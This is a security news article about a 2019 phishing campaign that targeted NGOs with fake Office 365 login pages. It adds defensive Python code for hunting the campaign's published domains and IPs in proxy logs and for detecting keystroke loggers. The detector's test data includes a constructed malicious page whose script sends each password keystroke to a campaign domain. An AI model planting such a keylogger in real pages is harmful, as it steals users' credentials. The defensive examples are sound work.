A new wave of a sophisticated, mobile-aware phishing campaign has been uncovered in the wild, mainly targeting non-governmental organizations (NGOs) in countries around the world.
The campaign has been live since March 2019. The attackers behind it host phishing content on two domains, session-services[.]com and service-ssl-check[.]com.
The phishing domains resolve to two IP addresses in the same network, 111[.]90[.]142[.]105 and 111[.]90[.]142[.]91. Both addresses have a history of suspicious activity and a very low reputation, and have previously been used to host malware.
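Defenders will mostly want to turn the two domains and two IP addresses above into a hunt over their own web-proxy or DNS logs. The script below is an added example, not code from the original article or from Lookout: it refangs the published indicators, then checks each line of a constructed proxy log in a hypothetical format (timestamp, client IP, method, URL, destination IP, status). An exact domain or IP match is reported as a hit; because the write-up only says the two IPs are in the same network, treating that network as a /24 is an assumption, and a hit on the /24 alone is reported as weak.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Indicators as published for the campaign, kept in their defanged form.
DEFANGED_DOMAINS = ["session-services[.]com", "service-ssl-check[.]com"]
DEFANGED_IPS = ["111[.]90[.]142[.]105", "111[.]90[.]142[.]91"]


def refang(indicator):
    """Undo common defanging ('[.]', 'hxxp') so the value can be compared to logs."""
    return re.sub(r"\[\.\]", ".", indicator.strip()).replace("hxxp", "http")


DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
IPS = {ipaddress.ip_address(refang(ip)) for ip in DEFANGED_IPS}
# Assumption for this example: the "same network" mentioned in the write-up is a /24.
# A destination that only falls inside it is reported as a weak hit, not a confirmed one.
SUSPECT_NETS = {ipaddress.ip_network(f"{ip}/24", strict=False) for ip in IPS}

# Hypothetical proxy log format assumed here:
# <timestamp> <client_ip> <method> <url> <destination_ip> <status>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<dest>\S+) (?P<status>\d{3})$"
)


def domain_hit(host):
    """Exact or subdomain match against the phishing domains."""
    if not host:
        return None
    host = host.lower().rstrip(".")
    for d in DOMAINS:
        if host == d or host.endswith("." + d):
            return f"domain:{d}"
    return None


def ip_hit(dest):
    """Exact IP match is a strong hit; same assumed /24 only is a weak hit."""
    try:
        addr = ipaddress.ip_address(dest)
    except ValueError:
        return None
    if addr in IPS:
        return f"ip:{addr}"
    if any(addr in net for net in SUSPECT_NETS):
        return f"weak-net:{addr}"
    return None


def check_line(line):
    """Return (client, url, [reasons]) for a log line that matches an indicator, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    reasons = [r for r in (domain_hit(urlsplit(m["url"]).hostname), ip_hit(m["dest"])) if r]
    if not reasons:
        return None
    return m["client"], m["url"], reasons


def scan(log_text):
    """Run check_line over every line of a log and keep only the hits."""
    return [hit for hit in (check_line(line) for line in log_text.splitlines()) if hit]


# Constructed sample log for the example (10.20.1.x clients, 203.0.113.10 as an
# unrelated destination, 111.90.142.50 as a same-/24 but unconfirmed address).
SAMPLE_LOG = """\
2019-06-03T09:12:41Z 10.20.1.15 GET https://session-services.com/office365/login 111.90.142.105 200
2019-06-03T09:12:45Z 10.20.1.15 POST https://session-services.com/office365/log 111.90.142.105 200
2019-06-03T09:13:02Z 10.20.1.22 GET https://login.microsoftonline.com/ 203.0.113.10 200
2019-06-03T09:14:10Z 10.20.1.31 GET https://cdn.service-ssl-check.com/a.js 111.90.142.91 200
2019-06-03T09:15:00Z 10.20.1.40 GET http://example.org/ 111.90.142.50 200
"""

if __name__ == "__main__":
    for client, url, reasons in scan(SAMPLE_LOG):
        print(client, url, ", ".join(reasons))
```

Matching on the destination IP as well as the URL host catches cases where the operator points a fresh domain at the same server; the weak-hit tier keeps that extra coverage from turning every neighbour in the /24 into a false positive.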
Keylogging and fake Office 365 login pages
The mobile-aware phishing campaign uses several techniques: a fake Office 365 login page, a valid SSL certificate that makes the site appear legitimate, and keystroke logging on the login form.
“Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception.”
Researchers found strong evidence of keylogging functionality embedded in the password field of the phishing login pages.
According to Lookout’s research, “Attackers cleverly embedded the keylogger that even works if the target doesn’t complete the login activity by pressing the login button or if they enter another, unintended password; this information is still sent back to the command and control infrastructure operated by the malicious actor.”
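The practical lesson of that quote is that a password typed into the page is exposed on every keystroke, whether or not the form is ever submitted, so a triage step when a suspicious login page is captured is to look for a key or input listener on the password field combined with an outbound script call. The checker below is an added example, not Lookout’s detection and not code from the article: it applies regex heuristics to page source, and the two HTML samples it runs on are constructed for the example (the session-services.com exfiltration URL in the first sample is illustrative, not a URL taken from the campaign).

```python
import re

# Three things that together indicate a per-keystroke leak from a login page:
# a password field, a key/input event listener, and an outbound call from script.
PASSWORD_FIELD = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)
KEY_LISTENER = re.compile(
    r"addEventListener\s*\(\s*['\"](?:keyup|keydown|keypress|input)['\"]"
    r"|\bon(?:keyup|keydown|keypress|input)\s*=",
    re.I,
)
EXFIL_CALL = re.compile(r"fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|new\s+Image\s*\(", re.I)
# First literal argument of fetch()/sendBeacon(), or the URL argument of XMLHttpRequest.open().
TARGET_RE = re.compile(
    r"(?:fetch|sendBeacon)\s*\(\s*['\"]([^'\"]+)['\"]"
    r"|\.open\s*\(\s*['\"][A-Z]+['\"]\s*,\s*['\"]([^'\"]+)['\"]",
    re.I,
)


def assess(html):
    """Report which of the three signals are present and whether all three line up."""
    findings = {
        "password_field": bool(PASSWORD_FIELD.search(html)),
        "key_listener": bool(KEY_LISTENER.search(html)),
        "exfil_call": bool(EXFIL_CALL.search(html)),
    }
    suspicious = all(findings.values())
    findings["keystroke_exfil"] = suspicious
    return findings


def exfil_targets(html):
    """Literal URLs passed to the outbound calls, for pivoting to C2 infrastructure."""
    return [a or b for a, b in TARGET_RE.findall(html)]


# Constructed sample: the password field leaks its partial value on every keyup.
MALICIOUS_PAGE = """
<form id="login" action="/login" method="post">
  <input type="email" name="user">
  <input type="password" name="pass" id="pass">
  <button type="submit">Sign in</button>
</form>
<script>
document.getElementById('pass').addEventListener('keyup', function (e) {
  fetch('https://session-services.com/k?v=' + encodeURIComponent(e.target.value));
});
</script>
"""

# Constructed sample: same field, same fetch(), but only on submit, so no per-keystroke leak.
BENIGN_PAGE = """
<form id="login" action="/login" method="post">
  <input type="password" name="pass" id="pass">
  <button type="submit">Sign in</button>
</form>
<script>
document.getElementById('login').addEventListener('submit', function (e) {
  e.preventDefault();
  fetch('/login', {method: 'POST', body: new FormData(e.target)});
});
</script>
"""

if __name__ == "__main__":
    for name, page in (("malicious", MALICIOUS_PAGE), ("benign", BENIGN_PAGE)):
        print(name, assess(page), exfil_targets(page))
```

The benign sample shows why the three signals are combined rather than alerting on any one of them: a normal single-page login also calls fetch() with a password field on the page, and only the key-level listener distinguishes the logger. Obfuscated or externally loaded scripts will evade these regexes, so treat a negative result as "nothing found in this source", not as a clean bill of health.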
The phishing sites are served with valid SSL certificates, so the browser padlock gives the victim no warning; this is one of several noteworthy techniques the attackers employ in this campaign.
“The mobile-aware component found in this campaign is further proof that phishing attacks have evolved to target mobile devices. Mobile phishing has emerged as a source of increased risk for enterprises,” Lookout concluded.